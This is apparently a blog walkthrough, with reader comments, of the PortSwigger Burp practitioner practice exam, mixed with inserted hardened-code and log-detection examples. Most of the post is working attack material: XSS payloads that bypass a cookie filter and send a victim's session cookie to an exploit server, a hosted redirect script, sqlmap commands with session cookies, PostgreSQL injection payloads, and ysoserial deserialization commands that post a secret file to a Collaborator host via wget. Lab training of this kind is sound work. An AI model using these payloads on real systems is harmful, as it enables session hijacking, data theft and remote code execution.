For details of the exam and labs, go to https://portswigger.net/web-security/certification/how-it-works
EXAM PREP 1/3: XSS
1. DOM XSS in lookup function
- To find it, send the lookup request to Intruder and scan it; Burp Scanner will report it as either DOM-based or non-DOM XSS. The vulnerable JS is at 'resources/js/searchResults.js'.
- The Chrome "untrusted types" plugin shows, in the DevTools Console tab, the eval statement in which the reflected value is used!
It shows the JS statement you need to complete with the payload:
var searchResultsObj = {"results":[],"searchTerm":""-alert(1)-""}
- Possible payloads at the search function are (refer to Lab: Reflected DOM XSS):
\\"-alert(1)}//
OR
"-alert(1)-"
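As an added example (not code from this post or from the lab), the eval sink that the "-alert(1)-" payload abuses, modelled in JavaScript beside a hardened version that passes the search term as real JSON; the function names and the exact layout of searchResults.js are assumptions.

```javascript
// Added example, not code from this post or from the PortSwigger lab. It models the
// eval() sink that the "-alert(1)-" payload abuses: the search term is spliced as
// text into a JS object literal and evaluated. Function names and the exact shape of
// the lab's searchResults.js are assumptions.

// Records whether injected code ran; stands in for alert(1) outside a browser.
const executed = [];
function probe() { executed.push('injected code ran'); return 0; }
function resetProbe() { executed.length = 0; }

// VULNERABLE: raw concatenation into source text, then eval(). The term "-probe()-"
// closes the string literal and turns the property value into the expression
// "" - probe() - "" , so probe() runs and searchTerm silently becomes 0.
function parseResultsUnsafe(searchTerm) {
  const src = '({"results":[],"searchTerm":"' + searchTerm + '"})';
  return eval(src); // eslint-disable-line no-eval
}

// HARDENED: the server emits real JSON and the client reads it with JSON.parse,
// which never executes code. JSON.stringify escapes both quotes and backslashes,
// so the backslash-prefix trick behind the \\"-alert(1)}// variant does not apply;
// '<' is escaped as well in case the JSON is inlined inside a <script> element.
function serializeResults(searchTerm) {
  return JSON.stringify({ results: [], searchTerm }).replace(/</g, '\\u003c');
}
function parseResultsSafe(jsonText) {
  return JSON.parse(jsonText);
}

// A keyword blocklist such as the lab's document.cookie filter is not a fix: the
// window["document"]["cookie"] spelling from the page passes straight through.
function naiveFilterBlocks(searchTerm) {
  return /document\.cookie/i.test(searchTerm);
}
```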
- notes: https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
- Highly recommended: install https://github.com/filedescriptor/untrusted-types for Chrome; it is useful for looking for dangerous sinks such as eval. E.g.:
- "-alert(document.cookie)-" will be blocked by the server (you can see this in the Network tab in DevTools), so you need to find a bypass; google it.
To bypass the document.cookie filter, use this trick:
\\"-alert(window["document"]["cookie"])}//
OR
"-alert(window["document"]["cookie"])-"
*Go to https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/ for more info.*
*Use the "untrusted types" Chrome plugin to help you get the right bypass syntax.*
- To send the victim's cookie to the attacker's server and evade the filter, URL-encode the dots as %2e:
\\"-(window["document"]["location"]="https://exploit-ac271f041e05294980199d1901ad0098%2eweb-security-academy%2enet/?"+window["document"]["cookie"])}//
OR
"-(window["document"]["location"]="https://exploit-ace61f411f22344280191eb3016d00ea%2eweb-security-academy%2enet//?"+window["document"]["cookie"])-"
- Host this JS script on the exploit server (taken from "Lab: Reflected XSS into HTML context with all tags blocked except custom ones"). The URL in the exploit server must be completely URL-encoded.
<script>
location='https://ac2d1f471e24291580959d6900e30065.web-security-academy.net/?lookup=%5C%5C%22-%28window%5B%22document%22%5D%5B%22location%22%5D%3D%22https%3A%2F%2Fexploit-ac271f041e05294980199d1901ad0098%252eweb-security-academy%252enet%2F%3F%22%2Bwindow%5B%22document%22%5D%5B%22cookie%22%5D%29%7D%2F%2F';
</script>
OR
!! NOTE: the parameter name differs between instances (search_term, lookup, ...), watch out!!
<script>
location='https://ac701f751f8f348b80171ec10036004a.web-security-academy.net/?search_term=%22-%28window%5B%22document%22%5D%5B%22location%22%5D%3D%22https%3A%2F%2Fexploit-ace61f411f22344280191eb3016d00ea%252eweb-security-academy%252enet%2F%2F%3F%22%2Bwindow%5B%22document%22%5D%5B%22cookie%22%5D%29-%22';
</script>
- Obtain the session cookie for carlos and log in. You are done with 1/3. Now time to access the admin panel!
EXAM PREP 2/3: SQLi
2. Use Burp Scanner to scan for SQLi.
- The insertion point is the 'SortBy=DATE' parameter; appending a quote breaks the query:
https://ac2d1f471e24291580959d6900e30065.web-security-academy.net/filtered-search?lookup=test&SortBy=DATE'&blogger=
- Put a * at the insertion point and feed it into sqlmap like a pro hacker to extract the data:
sqlmap -u "https://ac2d1f471e24291580959d6900e30065.web-security-academy.net/filtered-search?lookup=test&SortBy=DATE*&blogger=" --cookie="_lab=46%7cMCwCFG2IfeQ5CHUndYpTAPtmGpE8MZRHAhROekAjQ2%2bFoBDYXnQhjEaI0TGBCTenrDuN8SmGoEzablVpLkdA07iiBE72yehRPHxSL5BW4bAUUq1m6Apg%2fO6jwIIPOjCU4qfFuoNCIz9S%2f7Nk12%2fOvm4C7BmOU4QbEYLOdPrZgIGUCe0%3d; session=DtX3UfneU9ZTeTlU20TY7lUzRj7DEhCL" --dump
- Based on sqlmap, the PostgreSQL injections are:
Parameter: #1* (URI)
Type: boolean-based blind
Title: PostgreSQL boolean-based blind - Parameter replace
Payload: https://ac701f751f8f348b80171ec10036004a.web-security-academy.net:443/filtered_search?SearchTerm=test&organizeBy=(SELECT (CASE WHEN (9975=9975) THEN 9975 ELSE 1/(SELECT 0) END))&blogartist=
Type: error-based
Title: PostgreSQL error-based - Parameter replace
Payload: https://ac701f751f8f348b80171ec10036004a.web-security-academy.net:443/filtered_search?SearchTerm=test&organizeBy=(CAST((CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (4363=4363) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(106)||CHR(113)) AS NUMERIC))&blogartist=
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: https://ac701f751f8f348b80171ec10036004a.web-security-academy.net:443/filtered_search?SearchTerm=test&organizeBy=DATE;SELECT PG_SLEEP(5)--&blogartist=
Type: time-based blind
Title: PostgreSQL > 8.1 time-based blind - Parameter replace
Payload: https://ac701f751f8f348b80171ec10036004a.web-security-academy.net:443/filtered_search?SearchTerm=test&organizeBy=(SELECT 5932 FROM PG_SLEEP(5))&blogartist=
- Use the following manual SQLi to get the admin password:
????????
- Extract the administrator password and delete user carlos from the admin panel.
EXAM PREP 3/3: DESERIALIZATION
3. Insecure deserialization in the admin-prefs cookie! The bug can be detected using Burp Scanner.
- The payload is base64 + gzip. Use the Burp 'Deserialization Scanner' plugin to test and confirm the gadget. It will detect the following:
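Added example, not from this post or from sqlmap: since ORDER BY takes an identifier rather than a value, the sort parameter cannot be a bind variable, so the fix is an allowlist; the block also flags the sqlmap payload shapes above in constructed access-log lines. Table and column names and the log lines are assumptions made up for the example.

```javascript
// Added example (not from the post or sqlmap). ORDER BY takes an identifier, so the
// sort parameter (SortBy / organizeBy above) cannot be a bind variable: allowlist it.
// A second function flags the sqlmap payload shapes from the output above in logs.
// Table/column names and the log lines are constructed for this example.
const SORT_COLUMNS = Object.freeze({ DATE: 'created_at', TITLE: 'title', AUTHOR: 'author' });

// Only an exact allowlist key reaches the SQL text; anything else is rejected.
function sortColumnFor(param) {
  if (typeof param !== 'string' || !Object.prototype.hasOwnProperty.call(SORT_COLUMNS, param)) {
    throw new Error(`invalid SortBy value: ${JSON.stringify(param)}`);
  }
  return SORT_COLUMNS[param];
}

// The search term stays a bind variable ($1); only the allowlisted column is spliced.
function buildSearchQuery(sortParam) {
  return `SELECT id, title FROM posts WHERE title ILIKE $1 ORDER BY ${sortColumnFor(sortParam)}`;
}

// Shapes of the four sqlmap findings above: boolean CASE WHEN, error-based
// CAST(... AS NUMERIC), stacked ";SELECT" and PG_SLEEP timing.
const SQLI_PATTERNS = [
  /\bcase\s+when\b/i,
  /\bcast\s*\(.*\bas\s+numeric\b/i,
  /;\s*select\b/i,
  /\bpg_sleep\s*\(/i,
];

// Returns the access-log lines whose (URL-decoded) query string matches a shape.
function flagSuspiciousRequests(logLines) {
  const hits = [];
  for (const line of logLines) {
    const m = /"GET\s+([^\s"]+)/.exec(line);
    if (!m) continue;
    let query;
    try { query = decodeURIComponent(m[1].replace(/\+/g, ' ')); } catch (e) { query = m[1]; }
    const pattern = SQLI_PATTERNS.find(p => p.test(query));
    if (pattern) hits.push({ line, query, pattern: pattern.source });
  }
  return hits;
}

// Constructed sample log lines (IPs and timestamps are made up).
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2022:10:00:00 +0000] "GET /filtered-search?lookup=test&SortBy=DATE&blogger= HTTP/1.1" 200 512',
  '10.0.0.9 - - [01/Jan/2022:10:00:01 +0000] "GET /filtered-search?lookup=test&SortBy=(SELECT%205932%20FROM%20PG_SLEEP(5))&blogger= HTTP/1.1" 200 512',
  '10.0.0.9 - - [01/Jan/2022:10:00:02 +0000] "GET /filtered-search?lookup=test&SortBy=DATE;SELECT%20PG_SLEEP(5)--&blogger= HTTP/1.1" 500 0',
];
```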
Apache Commons Collections 3 Alternate payload 2 (Sleep): Potentially VULNERABLE!!!
Commons BeanUtils (Sleep): Potentially VULNERABLE!!!
Apache Commons Collections 3 Alternate payload 3 (Sleep): Potentially VULNERABLE!!!
!! ALL FALSE POSITIVES, NEED TO TEST YOURSELF, LOOK IN THE BURP SCANNER OUTPUT !!
- Do this in Kali!! You need ysoserial.jar.
- Refer to Lab: Exploiting Java deserialization with Apache Commons.
E.g.:
java -jar ysoserial-master-d367e379d9-1.jar CommonsCollections5 'cat /home/carlos/secret' | base64
- Backticks are blocked, so don't try to exfiltrate OOB via DNS or wget with command substitution, e.g. host `cat /home/carlos/secret`.xxxxx.burpcollaborator.net. It won't work!
- CommonsCollections5:
java -jar ysoserial-master-d367e379d9-1.jar CommonsCollections5 'wget --post-file /home/carlos/secret 57atjr760eg9rmvtk7hwu2ho4fa68ux.burpcollaborator.net' | gzip -f | base64 -w0
- https://notsosecure.com/oob-exploitation-cheatsheet/
- You need to exfiltrate /home/carlos/secret OOB in the wget request; the output will be visible in Burp Collaborator.
3/3 completed

Hey - I know this is for the practice exam, but have you attempted the real exam? If so, how different is it, or is it much more difficult compared to the practice one?

yes, please refer to https://www.r00tpgp.com/2021/12/burp-certified-practitioner-exam.html

For me the deserialization worked with CommonsCollections6

cool! Good luck with the exam!

hi, I'm just confused on this:
"- Host this js script on exploit server, taken from "Lab: Reflected XSS into HTML context with all tags blocked except custom ones". The url in exploit server must be uri encoded completely."
I already tried to input something similar to your js script and I tried to modify it (only the URL), but there is no session for carlos.
can you explain how to?
with the xss payload I only get my session, not carlos's session. please explain. thank you.

Good Job Buddy!

This is really helpful.
This is the only blog post regarding the practice exam I found.
Thank You so much.
Hi! can you share how you can get carlos's session?

Go to the exploit server and add this in the body section; make sure to replace the lab id and exploit-server id.
Store and click deliver exploit to victim, then check the access log; you will find something like session=xxxx.
Copy the session id and press F12 (Firefox) to open developer tools, go to Application and replace the older session id with the newer one. Press enter, refresh your tab and head over to the My Account section. You will see the 1st part of the lab solved.
<script>
location='https://ac701f751f8f348b80171ec10036004a.web-security-academy.net/?search_term=%22-%28window%5B%22document%22%5D%5B%22location%22%5D%3D%22https%3A%2F%2Fexploit-ace61f411f22344280191eb3016d00ea%252eweb-security-academy%252enet%2F%2F%3F%22%2Bwindow%5B%22document%22%5D%5B%22cookie%22%5D%29-%22';
</script>
(make sure to include the script tags, I cannot enter them here, it's not allowed here)
Thank youuu so muchh

To solve the lab, you have to complete all three steps. Now that you have solved the first step, the second step is to exploit the SQLi to find the administrator password and log in as administrator, and third you have to exploit the admin-prefs cookie; you will receive the key in Burp Collaborator.

yes, thank you Ilyas for your help. Now I am on the 3rd phase, and I have never faced this deserialization technique before. thank you once again

hey ilyas, I got stuck on phase 3. there is no response in my Burp Collaborator client. I used the same way as in this clue, using CommonsCollections5 and wget --post. do you have any clue for this?

change it to CommonsCollections6, copy the output and paste it in the Decoder tab, encode it as URL, copy the encoded payload and paste it directly in the req section of the admin-prefs cookie. send the req and click the poll button multiple times.
Hello.

Is it possible to contact you via Telegram?
Thanks.
Thanks for the post. Can you let me know which encoder you used to encode the dots in url format %2e, because most URL encoders I try do not encode the . which is in the payload.

Awesome <3